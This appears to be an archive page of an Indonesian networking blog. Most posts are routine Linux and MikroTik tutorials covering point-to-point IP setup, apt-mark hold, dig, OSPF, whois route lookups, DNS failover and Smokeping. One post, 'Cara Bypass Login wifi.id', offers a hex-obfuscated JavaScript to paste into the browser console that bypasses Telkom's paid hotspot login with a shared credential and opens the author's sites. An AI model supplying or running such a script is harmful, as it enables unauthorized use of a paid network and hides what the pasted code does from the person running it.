~]*[ rahox ]*[~: 2016

Thursday, October 6, 2016

Config ether centos model point to point

Langsung saja config ip address ethernet pada centos mode point to point, dimana teknik ini untuk menghemat ip. Gamblangnya gini.
+ Pada ethernet mikrotik diset ip addressnya 10.10.10.196/32 dan networknya 49.123.123.196
+ Pada ethernet centos diset ip addressnya 49.123.123.196/32 dan networknya 10.10.10.196
*) Ga usah bingung, pokoknya saling tukeran ip.

nano /etc/sysconfig/networking/devices/ifcfg-eth0

# Intel Corporation 82540EM Gigabit Ethernet Controller
DEVICE=eth0
BOOTPROTO=none
HWADDR=9a:99:0f:f5:e3:f9
ONBOOT=yes
TYPE=Ethernet
NETMASK=255.255.255.255
IPADDR=49.123.123.196
SCOPE="peer 10.10.10.196"
GATEWAY=10.10.10.196

apt-get upgrade pengecualian package tertentu

Pernah kepikiran nggak sobat, saat kita apt-get upgrade menambahkan pengecualian pada package tertentu ?
jadi misal gini nih :

root@zpanel:/home/rahox# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
base-files bind9 bind9-host bind9utils cpio dnsutils dpkg dpkg-dev git git-man grub-common grub-pc grub-pc-bin grub2-common
isc-dhcp-client isc-dhcp-common krb5-locales libbind9-80 libc-bin libc-dev-bin libc6 libc6-dev libdns88 libdpkg-perl
libfreetype6 libgcrypt11 libgd2-xpm libgnutls26 libgssapi-krb5-2 libisc84 libisccc80 libisccfg82 libk5crypto3 libkrb5-3
libkrb5support0 libldap-2.4-2 liblwres80 libmysqlclient18 libpng12-0 libpq5 libruby1.9.1 libssh2-1 libssl1.0.0 libxapian22
libxml2 linux-libc-dev locales multiarch-support mysql-client-5.5 mysql-common mysql-server mysql-server-5.5
mysql-server-core-5.5 openssh-client openssh-server openssl perl perl-base perl-modules ruby1.9.1 ruby1.9.1-dev sudo tzdata
unzip
64 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 69.1 MB of archives.
After this operation, 1,268 kB of additional disk space will be used.
Do you want to continue [Y/n]

Nah yang saya tandai warna merah itu kepengen dikecualikan atau pengen tidak ikut ter-upgrade saat melakukan apt-get upgrade.
Baiklah, caranya kita mark apt dulu package mana yang hendak kita hold atau kita kecualikan. Langsung aja ketik begini :

root@zpanel:/home/rahox# apt-mark hold openssh-client openssh-server
openssh-client set on hold.
openssh-server set on hold.

Nah abis itu dipastikan saat apt-get upgrade ngga ada lagi package openssh-server yang akan diupgrade. Hasilnya gini sob :

root@zpanel:/home/rahox# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
openssh-client openssh-server
The following packages will be upgraded:
base-files bind9 bind9-host bind9utils cpio dnsutils dpkg dpkg-dev git git-man grub-common grub-pc grub-pc-bin grub2-common
isc-dhcp-client isc-dhcp-common krb5-locales libbind9-80 libc-bin libc-dev-bin libc6 libc6-dev libdns88 libdpkg-perl
libfreetype6 libgcrypt11 libgd2-xpm libgnutls26 libgssapi-krb5-2 libisc84 libisccc80 libisccfg82 libk5crypto3 libkrb5-3
libkrb5support0 libldap-2.4-2 liblwres80 libmysqlclient18 libpng12-0 libpq5 libruby1.9.1 libssh2-1 libssl1.0.0 libxapian22
libxml2 linux-libc-dev locales multiarch-support mysql-client-5.5 mysql-common mysql-server mysql-server-5.5
mysql-server-core-5.5 openssl perl perl-base perl-modules ruby1.9.1 ruby1.9.1-dev sudo tzdata unzip
62 upgraded, 0 newly installed, 0 to remove and 2 not upgraded.
Need to get 67.8 MB of archives.
After this operation, 1,107 kB of additional disk space will be used.
Do you want to continue [Y/n]

Untuk menghapus mark tinggal unhold aja

root@zpanel:/home/rahox# apt-mark unhold openssh-client openssh-server
Canceled hold on openssh-client.
Canceled hold on openssh-server.

Semoga bermanfaat.

Monday, September 26, 2016

Diagram Kabel UTP

Sekedar info buat pengetahuan dasar tentang diagram kabel UTP.

Dijelaskan bahwa ke-delapan kabel itu memiliki fungsi dan tugasnya masing masing. Dimana setiap perangkat yang dikoneksikan melalui perantara kabel membutuhkan TX (Transmit) dan RX (Receive). Normalnya jika hanya beroperasi 10/100Mbps cukup membutuhkan 4 kabel saja.
Beda halnya jika perangkat itu membutuhkan POWER-DC seperti produk-produk TP-Link, UBNT, Mikrotik, dan lain sebagainya. Maka membutuhkan kabel dc injector. Adapun nama lain komponen penunjang itu adalah Power Over Ethernet atau biasa disebut PoE seperti berikut :

Friday, September 16, 2016

Command dig dengan port tertentu

Apa itu dig ?
+ dig adalah utility linux untuk me-lookup dns. (Simple nya aja mirip nslookup)
Bagaimana contoh comand nya ?
+ pada console ketikkan aja misalkan dig google.com nanti muncul seperti ini

root@pi /home/pi # dig google.com

; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28771
;; flags: qr rd ra; QUERY: 1, ANSWER: 16, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;google.com.                    IN      A

;; ANSWER SECTION:
google.com.             109     IN      A       117.102.117.227
google.com.             109     IN      A       117.102.117.212
google.com.             109     IN      A       117.102.117.238
google.com.             109     IN      A       117.102.117.234
google.com.             109     IN      A       117.102.117.251
google.com.             109     IN      A       117.102.117.249
google.com.             109     IN      A       117.102.117.208
google.com.             109     IN      A       117.102.117.241
google.com.             109     IN      A       117.102.117.245
google.com.             109     IN      A       117.102.117.230
google.com.             109     IN      A       117.102.117.223
google.com.             109     IN      A       117.102.117.218
google.com.             109     IN      A       117.102.117.219
google.com.             109     IN      A       117.102.117.216
google.com.             109     IN      A       117.102.117.229
google.com.             109     IN      A       117.102.117.240

;; Query time: 2 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Sep 16 06:55:41 WIB 2016
;; MSG SIZE rcvd: 295

Lalu bagaimana jika dalam satu mesin terdapat 2 service DNS Server ?
+ kita tambahkan parameter -p untuk memilih port khusus.

Mari langsung saja. Di bawah ini saya kasih sampel dalam 1 mesin menggunakan 2 DNS Server yakni unbound dan dnsmasq. Perhatikan yang saya beri warna merah adalah port yang sedang aktif. Jadi walaupun ada 2 Service DNS Server tidak bentrok karena beda port.
*) catatan : unbound untuk mesin produksi, untuk memilih akamai server suka suka kita. Dan dnsmasq sebenernya include dari pihole untuk mem-blok iklan.

root@pi /home/pi # netstat -tulpn
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      993/mysqld
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      662/lighttpd
tcp        0      0 0.0.0.0:52              0.0.0.0:*               LISTEN      556/dnsmasq
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      1158/unbound
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      443/sshd
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      446/inetd
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      1158/unbound
tcp        0      0 0.0.0.0:8000            0.0.0.0:*               LISTEN      449/sc_serv
tcp        0      0 0.0.0.0:8001            0.0.0.0:*               LISTEN      449/sc_serv
tcp6       0      0 :::80                   :::*                    LISTEN      662/lighttpd
tcp6       0      0 :::52                   :::*                    LISTEN      556/dnsmasq
tcp6       0      0 :::22                   :::*                    LISTEN      443/sshd
udp        0      0 27.131.2.1:123          0.0.0.0:*                           510/ntpd
udp        0      0 127.0.0.1:123           0.0.0.0:*                           510/ntpd
udp        0      0 0.0.0.0:123             0.0.0.0:*                           510/ntpd
udp        0      0 0.0.0.0:52              0.0.0.0:*                           556/dnsmasq
udp        0      0 0.0.0.0:53              0.0.0.0:*                           1158/unbound
udp6       0      0 fe80::ba27:ebff:fec:123 :::*                                510/ntpd
udp6       0      0 ::1:123                 :::*                                510/ntpd
udp6       0      0 :::123                  :::*                                510/ntpd
udp6       0      0 :::52                   :::*                                556/dnsmasq

Nah, sudah kelihatan bukan ? disana terdapat 2 service unbound dan dnsmasq dimana port service nya beda. Lalu mari kita pilih mau me-resolve menggunakan unbound (port 53) atau dnsmasq (port 52) dengan cara sbb :

+ Di bawah ini contoh meresolve dengan service unbound

root@pi /home/pi # dig google.com @127.0.0.1 -p 53

; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> google.com @127.0.0.1 -p 53
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 40675
;; flags: qr rd ra; QUERY: 1, ANSWER: 16, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;google.com.                    IN      A

;; ANSWER SECTION:
google.com.             300     IN      A       117.102.117.227
google.com.             300     IN      A       117.102.117.212
google.com.             300     IN      A       117.102.117.238
google.com.             300     IN      A       117.102.117.234
google.com.             300     IN      A       117.102.117.251
google.com.             300     IN      A       117.102.117.249
google.com.             300     IN      A       117.102.117.208
google.com.             300     IN      A       117.102.117.241
google.com.             300     IN      A       117.102.117.245
google.com.             300     IN      A       117.102.117.230
google.com.             300     IN      A       117.102.117.223
google.com.             300     IN      A       117.102.117.218
google.com.             300     IN      A       117.102.117.219
google.com.             300     IN      A       117.102.117.216
google.com.             300     IN      A       117.102.117.229
google.com.             300     IN      A       117.102.117.240

;; Query time: 40 msec
;; SERVER: 127.0.0.1#53(127.0.0.1)
;; WHEN: Fri Sep 16 06:52:30 WIB 2016
;; MSG SIZE rcvd: 295

+ Dan di bawah ini meresolve menggunakan dnsmasq

root@pi /home/pi # dig google.com @127.0.0.1 -p 52

; <<>> DiG 9.9.5-9+deb8u6-Debian <<>> google.com @127.0.0.1 -p 52
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 37094
;; flags: qr rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 512
;; QUESTION SECTION:
;google.com.                    IN      A

;; ANSWER SECTION:
google.com.             299     IN      A       74.125.68.100
google.com.             299     IN      A       74.125.68.138
google.com.             299     IN      A       74.125.68.102
google.com.             299     IN      A       74.125.68.139
google.com.             299     IN      A       74.125.68.101
google.com.             299     IN      A       74.125.68.113

;; Query time: 32 msec
;; SERVER: 127.0.0.1#52(127.0.0.1)
;; WHEN: Fri Sep 16 06:52:31 WIB 2016
;; MSG SIZE rcvd: 135

Tuesday, August 30, 2016

Mengenal Type Area STUB Pada OSPF Mikrotik

Stub adalah jenis type area ospf yang non-standar.
Di dalam area stub jenis link state update yang masuk hanya LSA type 1,2,3 dan default route, tapi informasi yang dari stub area masih masuk ke secara utuh ke backbone area dan dapat di distribusikan ke area2 yg lain. Di stub area tak bisa redistribusi, jadi ngga ada ASBR.

Kapan dipakai stub :
Biasanya stub digunakan untuk router yang terkoneksi langsung dengan end user atau pengguna akhir.
Karena user biasa tidak perlu tau topologi jaringan ospf kita. Jadi cukup konek ke jaringan dan melakukan aktifitas internet. Itu untuk alasan keamanan yang pertama. Trus yg kedua mengurangi jenis LSA yang harus dikalkulasi. Karena nanti LSA type 4 dan 5 dari area yang lain akan masuk sebagai default route. Gampangnya, router yang diset jenis stub ini contohnya seperti End-User yang terkoneksi di area kita dan disana ada gateway lain.

Untuk konfigurasinya di menu /routing ospf area

*) Catatan : ini hanya berlaku bagi end user, backbone area tidak bisa melakukan stub.

Misalkan di R3 (type stub)

P2P dengan R3 : 172.16.77.2/29
Memiliki network :
10.221.1.0/24
10.221.2.0/24
10.221.3.0/24 dst....

dan pada R2 (type default)

P2P dengan R3 : 172.16.77.1/29
P2P dengan R1 : 10.10.27.2/30
Memiliki network :
192.168.10.0/24
192.168.104.0/24
192.168.105.0/24 dst....

dan pada R1 (type default)

P2P dengan R2 : 10.10.27.1/30
Memiliki network :
10.10.1.0/29
10.10.2.0/29
10.10.3.0/29 dst....

Jadi gampangnya, pada R1 ini, informasi network yang berada di R2 tetap diterima, akan tetapi, pada R1 tidak tahu network yang ada di R3 begitu pula sebaliknya. R3 tidak tau network yang berada di R1, dia (R-3) hanya tau dalam bentuk default route saja.

Bedanya Distribute Connected Routes as-type-1 dan as-type-2 Pada Ospf Mikrotik

Diketahui

.
R1   = ada berbagai ip
   10.10.1.0/29
   10.10.2.0/29 dst...
   = p2p dengan R2
   10.10.27.1/30

R2   = p2p dengan R1
   10.10.27.2/30
   = ada berbagai ip
   192.168.10.0/24 dst...
   = p2p dengan R3
   172.16.77.1/29

R3   = p2p dengan R2
   172.16.77.2/29
   = ada berbagai ip
   10.221.1.0/29
   10.221.2.0/29 dst...

ketiga router menjalankan routing OSPF.

Kita asumsikan mendistribusikan subnet ip masing masing router (R1-R3)
Jadi subnet R1 diterima R2 dan diterima R3

tujuan : mengetahui bedanya "Redistribusi Conected Routes" menggunakan type 1 dan type 2

=========
LETS GO !
=========

Pada R1 :
=========

/routing ospf instance set router-id=1.1.1.1 default
/routing ospf area add name=area-1 area-id=0.0.0.50
/routing ospf network add network=10.10.27.0/29 area=area-1
/routing ospf instance set redistribute-connected=as-type-1

Pada R2 :
=========

/routing ospf instance set router-id=2.2.2.2 default
/routing ospf area add name=area-1 area-id=0.0.0.50
/routing ospf network add network=10.10.27.0/29 area=area-1
/routing ospf network add network=172.16.77.0/29 area=area-1

Pada R3 :
=========

/routing ospf instance set router-id=3.3.3.3 default
/routing ospf area add name=area-1 area-id=0.0.0.50
/routing ospf network add network=172.16.77.0/29 area=area-1

Maka hasilnya :

Disana terlihat ada metric ospf yang berubah ketika menggunakan as-type-2.

Hal ini perlu diperhatikan untuk mendefinisikan routing terdekat dari network masing masing router. Anda bisa ubah pada menu "/routing ospf interface" yang mengarah ke masing2 router dan anda definisikan cost disana. Defaultnya bernilai 10, anda bisa ubah untuk disesuaikan routing yang didahulukan lewat yang mana dulu. Silahkan eksperimen. Thx.

Thursday, August 18, 2016

Cara Bypass Login wifi.id

Tahu wifi.id ? itu tuh layanan hotspot berbayar yang disediakan Telkom. Biasanya di tempat-tempat umum seperti cafe, mall, atau Plasa Telkom sendiri.

Konsepnya yakni meng-inject halaman login wifi.id sehinga tanpa login bisa internetan :)
Ok ini sebagai pembelajaran saja. Saya tidak bertangungjawab atas penyalahgunaan script injector berikut ini. Langsung saja.

Jika menggunakan browser Google Chrome, tekan :

CTRL + SHIFT + J

Jika menggunakan browser Mozilla tekan :

CTRL + SHIFT + K

Lalu pilih tab console
masukkan script di bawah ini lalu tekan enter, jika sukses terinjeksi maka akan muncul message box.

// ==UserScript==
// @name         @wifi.id login bypasser
// @namespace    http://www.dxdiag.co.uk
// @version      3
// @description  Connect ke wifi.id tanpa login :)
// @new feature  Auto detect welcome. ex welcome9 welcome2 etc.
// @author       MrDxdiag
// @match        http://*.wifi.id/*
// @downloadURL http://pastebin.com/raw/HmuDQKwF
// @updateURL   http://pastebin.com/raw/HmuDQKwF
// @grant        none
// ==/UserScript==
/* jshint -W097 */
'use strict';
// @wifi.id login by MrDxdiag
// God Bless Us
// www.mydxdiag.com
/*
* Tutorial sudah banyak di google, tapi hanya script ini yg official
* mydxdiag.com
* Semua karya berharga, tolong di hargai pembuatnya.
* Karya bukan ajang untuk cari nama, tapi untuk berbagi dengan sesama.
* Lebih baik dikenal daripada terkenal :)
*/
var _0xa7a5=["\x5C\x5D","\x72\x65\x70\x6C\x61\x63\x65","\x5C\x5B","\x5B\x5C\x3F\x26\x5D","\x3D\x28\x5B\x5E\x26\x23\x5D\x2A\x29","\x73\x65\x61\x72\x63\x68","\x65\x78\x65\x63","","\x20","\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30","\x72\x61\x6E\x64\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x66\x6C\x6F\x6F\x72","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x40\x77\x69\x66\x69\x2E\x69\x64\x20\x69\x6E\x6A\x65\x63\x74\x6F\x72\x20\x76\x33\x20\x0A\x20\x5B\x2B\x5D\x20\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x6D\x65\x6C\x6F\x6E\x2E\x6D\x65\x6C\x6F\x6E\x40\x65\x76\x65\x6E\x74","\x67\x77\x5F\x69\x64","\x63\x6C\x69\x65\x6E\x74\x5F\x6D\x61\x63","\x75\x73\x65\x72\x6E\x61\x6D\x65\x3D","\x26\x70\x61\x73\x73\x77\x6F\x72\x64\x3D\x6D\x65\x6C\x6F\x6E\x26\x67\x77\x5F\x69\x64\x3D","\x26\x6D\x61\x63\x3D","\x68\x74\x74\x70\x3A\x2F\x2F\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x61\x74\x2E\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D\x2F\x77\x69\x66\x69\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x65\x6C\x63\x6F\x6D\x65\x32\x2E\x77\x69\x66\x69\x2E\x69\x64\x2F\x61\x75\x74\x68\x6E\x65\x77\x2F\x6C\x6F\x67\x69\x6E\x2F\x63\x68\x65\x63\x6B\x5F\x6C\x6F\x67\x69\x6E\x2E\x70\x68\x70\x3F","\x50\x4F\x53\x54","\x6F\x70\x65\x6E","\x43\x6F\x6E\x74\x65\x6E\x74\x2D\x74\x79\x70\x65","\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x77\x77\x77\x2D\x66\x6F\x72\x6D\x2D\x75\x72\x6C\x65\x6E\x63\x6F\x64\x65\x64","\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61\x64\x65\x72","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x72\x65\x73\x70\x6F\x6E\x73\x65\x54\x65\x78\x74","\x70\x61\x72\x73\x65","\x72\x65\x73\x75\x6C\x74","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x52\x65\x73\x75\x6C\x74\x20\x3A\x20\x46\x61\x69\x6C\x65\x64\x20\x5B\x2B\x5D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x50\x6C\x65\x61\x73\x65\x20\x43\x68\x65\x63\x6B\x20\x74\x68\x65\x20\x63\x6F\x6E\x66\x69\x67\x20\x26\x20\x63\x6F\x6E\x74\x61\x63\x74\x20\x6D\x65\x20\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x52\x65\x73\x75\x6C\x74\x20\x3A\x20\x53\x75\x63\x63\x65\x73\x73\x20\x5B\x2B\x5D","\x2D\x2D\x2D\x2D\x2D\x2D\x5B\x2B\x4D\x72\x44\x78\x64\x69\x61\x67\x2B\x5D\x2D\x2D\x2D\x2D\x2D\x2D\x2D\x0A\x20\x5B\x2B\x5D\x20\x45\x6E\x6A\x6F\x79\x20\x74\x68\x65\x20\x72\x65\x61\x6C\x20\x66\x72\x65\x65\x20\x77\x69\x66\x69\x2E\x69\x64\x20\x62\x79\x20\x4D\x72\x44\x78\x64\x69\x61\x67","\x72\x65\x6C\x6F\x61\x64","\x5F\x6E\x65\x77","\x68\x72\x65\x66","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6D\x79\x64\x78\x64\x69\x61\x67\x2E\x63\x6F\x6D","\x45\x72\x72\x6F\x72","\x73\x65\x6E\x64"];function getParam(_0x64f3x2){_0x64f3x2= _0x64f3x2[_0xa7a5[1]](/[\[]/,_0xa7a5[2])[_0xa7a5[1]](/[\]]/,_0xa7a5[0]);var _0x64f3x3= new RegExp(_0xa7a5[3]+ _0x64f3x2+ _0xa7a5[4]),_0x64f3x4=_0x64f3x3[_0xa7a5[6]](location[_0xa7a5[5]]);return _0x64f3x4=== null?_0xa7a5[7]:decodeURIComponent(_0x64f3x4[1][_0xa7a5[1]](/\+/g,_0xa7a5[8]))}function randomString(_0x64f3x6,_0x64f3x7){_0x64f3x7= _0x64f3x7|| _0xa7a5[9];var randomString=_0xa7a5[7];for(var _0x64f3x8=0;_0x64f3x8< _0x64f3x6;_0x64f3x8++){var _0x64f3x9=Math[_0xa7a5[12]](Math[_0xa7a5[10]]()* _0x64f3x7[_0xa7a5[11]]);randomString+= _0x64f3x7[_0xa7a5[13]](_0x64f3x9,_0x64f3x9+ 1)};return randomString}alert(_0xa7a5[14]);var usr=_0xa7a5[15];var gw_id_dxd=getParam(_0xa7a5[16]);var mac_dxd=getParam(_0xa7a5[17]);var params=_0xa7a5[18]+ usr+ _0xa7a5[19]+ gw_id_dxd+ _0xa7a5[20]+ mac_dxd;var blog=_0xa7a5[21];var check_me=_0xa7a5[22];var url=_0xa7a5[23]+ params;var http= new XMLHttpRequest();http[_0xa7a5[25]](_0xa7a5[24],url,true);http[_0xa7a5[28]](_0xa7a5[26],_0xa7a5[27]);http[_0xa7a5[29]]= function(){if(http[_0xa7a5[30]]== 4&& http[_0xa7a5[31]]== 200){var _0x64f3x12=http[_0xa7a5[32]];obj= JSON[_0xa7a5[33]](_0x64f3x12);var _0x64f3x13=obj[_0xa7a5[34]];var _0x64f3x14=true;if(_0x64f3x13== 0){alert(_0xa7a5[35]);alert(_0xa7a5[36])}else {if(_0x64f3x13== 1){alert(_0xa7a5[37]);alert(_0xa7a5[38]);location[_0xa7a5[39]];window[_0xa7a5[25]](blog,_0xa7a5[40]);location[_0xa7a5[41]]= _0xa7a5[42];window[_0xa7a5[25]](check_me,_0xa7a5[40])}else {if(_0x64f3x13== 2){alert(_0xa7a5[43])}else {alert(_0xa7a5[43])}}}}};http[_0xa7a5[44]](params)

Thursday, May 12, 2016

Fetch All IP identified by ASNUMBER

pi@pi:~ $ /usr/bin/whois -h whois.radb.net -- '-i origin AS41690' | awk '/^route:/ {print "/ip route add gateway=10.11.12.13 dst-address=" $2;}' | sort | uniq
/ip route add gateway=10.11.12.13 dst-address=103.195.32.0/22
/ip route add gateway=10.11.12.13 dst-address=188.65.120.0/21
/ip route add gateway=10.11.12.13 dst-address=188.65.120.0/24
/ip route add gateway=10.11.12.13 dst-address=188.65.122.0/24
/ip route add gateway=10.11.12.13 dst-address=195.8.214.0/23
/ip route add gateway=10.11.12.13 dst-address=198.54.200.0/23
/ip route add gateway=10.11.12.13 dst-address=198.54.200.0/24
/ip route add gateway=10.11.12.13 dst-address=198.54.201.0/24
/ip route add gateway=10.11.12.13 dst-address=45.126.164.0/22

Tuesday, May 10, 2016

Fetch All ip Using Whois Radb

Jika Anda pengen tahu semua subnet ip dari sebuah AS-Number, atau berdasarkan IP tertentu, jalankan perintah ini pada terminal / console anda

whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net 31.13.79.1 | grep origin: | cut -d ' ' -f 6 | head -1) | grep -w "route:" | awk '{print $NF}' |sort -n | uniq

Dengan begitu akan muncul semua ip dalam As Number yang sama.

Script di atas dapat Anda buat untuk bash-script dengan membuat file yang isinya kira kira berikut

#!/bin/bash
echo "Usage: ./`basename ${0}` <ip>"
echo ""
/usr/bin/whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net $1 | grep origin: | cut -d ' ' -f 6 | head -1) | grep -w "route:" | awk '{print $NF}' |sort -n | uniq

Jangan lupa chmod 777 filetadi.sh
Lalu gunakan dengan cara ./filetadi.sh 31.13.79.1

Sunday, May 1, 2016

Scheduler Cek Dns Mikrotik

Jika Anda menggunakan Dns Server external, ada kalanya menemui kendala seperti service error, mungkin juga karena server mati, dan lain sebagainya. Kalau pc dns server mati, maka cukup dengan menggunakan netwatch. namun jika pc dns server masih on tetapi service dns-nya saja yang error maka timbul permasalahan yakni client-client tidak bisa melookup dns. Maka dari itu perlu adanya script agar ketika service mati pada dns server pun bisa tercover dengan membuat redirect port dns.Berikut ini solusinya :

Pertama tama, pastikan DNS Server sudah jadi
Yang kedua, buat scheduler seperti berikut ini

:global DNS
:if ([/ip firewall address-list find list=cek_dnsku] = "") do={
:if ($DNS != "down") do={
/ip firewall nat enable [find comment="redirect-dns"]
:set DNS "down"
:log error message="DNS DOWN"
}
} else={
:if ($DNS != "up") do={
/ip firewall nat disable [find comment="redirect-dns"]
:set DNS "up"
:log warning message="DNS UP"
}
}

Buat redirector dns pada mikrotik yang ini nantinya akan ter-enable saat service dns mati

/ip firewall nat
add action=dst-nat chain=dstnat comment=redirect-dns disabled=\
yes dst-port=53 protocol=udp src-address-list=cidr_client to-addresses=\
8.8.8.8 to-ports=53

Buat rule firewall untuk mengecek apakah dns service aktiv. (202.3.2.1 hanya contoh)

/ip firewall filter
add action=add-src-to-address-list address-list=cek_dnsku address-list-timeout=2s chain=forward comment=CEK-DNS disabled=no in-interface=vlan-622-DNS protocol=\
udp src-address=202.3.2.1 src-port=53

Alur kerja dari tutorial di atas :

Jika dns server anda yang berlamat ip 202.3.2.1 on, maka akan masuk ke address-list=cek_dnsku dan ini menandakan bahwa service normal tidak mengalami kendala.
Lalu misalkan jika service dns Anda stop, maka cek_dnsku tadi menghilang
Kemudian scheduler menjalankan perintah, apabila cek_dnsku tidak ada alamat ip 202.3.2.1 maka secara langsung akan meng-enable redirect dns yang telah Anda buat tadi pada ip firewall nat.
Secara berkala pastikan selalu melihat log pada mikrotik, karena kondisi service dns UP dan DOWN akan dilaporkan segera saat itu juga.

Semoga bermanfaat :)

Tuesday, March 29, 2016

Config Smokeping

Langkah langkah membuat sokeping latency grapher :

Install :

apt-get install smokeping sendmail -y

Buat file /etc/apache2/sites-enabled/smokeping.conf dan chmod 644

ScriptAlias /smokeping/smokeping.cgi /usr/lib/cgi-bin/smokeping.cgi
Alias /smokeping /usr/share/smokeping/www

<Directory "/usr/share/smokeping/www">
Options FollowSymLinks
</Directory>

Enable modul smokeping.conf

root@pi /etc/apache2/mods-available # a2ensite smokeping.conf
Enabling site smokeping.
To activate the new configuration, you need to run:
service apache2 reload

Enable modul cgi (karena sokeping butuh cgi)

root@pi /etc/apache2/sites-available # a2enmod cgi
AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.0.1. Set the 'ServerName' directive globally to suppress this message
Your MPM seems to be threaded. Selecting cgid instead of cgi.
Enabling module cgid.
To activate the new configuration, you need to run:
service apache2 restart

Edit file /etc/smokeping/config.d/Targets

*** Targets ***

probe = FPing

menu = Top
title = Network Latency Grapher
remark = Welcome to the SmokePing Latency Grapher

+ Local

menu = Local
title = Local Network
#parents = owner:/Test/James location:/

++ LocalMachine

menu = Local Machine
title = This host
host = localhost
#alerts = someloss


+ GlobalSite
menu = INTER
title = International Sites
 
++ Dota2
menu    = Dota2
title   = Dota2-103.28.54.1
host    = 103.28.54.1

++ Dota2-55
menu    = Dota2-55
title   = Dota2-103.28.55.250
host    = 103.28.55.250

++ GhostRecon
menu = GhostRecon
title = GhostRecon 54.64.204.13
host    = 54.64.204.13

++ AVA
menu = AVA
title = AVA 119.46.129.61
host = 119.46.129.61


++ PSO2
menu    = PSO2
title   = PhantasyStarOnline2-121.52.201.113
host    = 121.52.201.113

++ SOXDN2
menu    = SOXDN2
title   = SOXDN2-112.140.186.203
host    = 112.140.186.203

++ StormDN
menu    = StormDN
title   = StormDN-198.44.249.1
host    = 198.44.249.1

++ EVE
menu    = EVE
title   = EVE-119.81.16.118
host = 119.81.16.118

++ Facebook
menu = Facebook
title = Facebook 31.13.79.246
host = 31.13.79.246
 
++ Yahoo
menu = Yahoo
title = Yahoo
host = 106.10.139.246


+ LocalSites
menu = LOCAL
title = Local Sites
 

++ CBN
menu    = CBN
title   = CBN
host    = 202.158.92.218

++ Detik
menu = Detik
title = Detik 203.190.241.43
host = 203.190.241.43

++ Detik69
menu    = Detik
title   = Detik 203.190.242.69
host    = 203.190.242.69
 
++ Dizzel
menu    = Dizzel
title   = Dizzel-103.18.35.1
host    = 103.18.35.1

++ DotaNusa
menu = DotaNusa
title = dota.nusa.net.id
host = 202.162.207.111

++ GarenaLOL
menu    = GarenaLOL
title   = Garena LOL - 103.248.58.254
host    = 103.248.58.254

++ PBGarenaID
menu    = PBGarenaID
title   = PointBlank Garena ID
host    = 43.252.187.1

++ Asiasoft-AVA
menu    = Asiasoft-AVA
title   = Asiasoft-AVA 203.1.25.21
host    = 203.1.25.21

++ GarenaFifa
menu    = GarenaFifaSg
title   = Garena FifaOnline3 Singapore - 203.116.219.129
host    = 203.116.219.129

++ SpecialForce2
menu    = SpecialForce2
title   = Special Force 2 - 103.249.58.254 - via 202.43.74.76 
host    = 202.43.74.76

++ DotaGoGamers
menu    = DotaGoGamers
title   = dota.gogamers.us
host    = 49.128.182.218

++ Gemscool-Lama
menu = GemscoolLama
title = Gemscool-203.89.146.118
host = 203.89.146.118

++ Gemscool-Baru-21
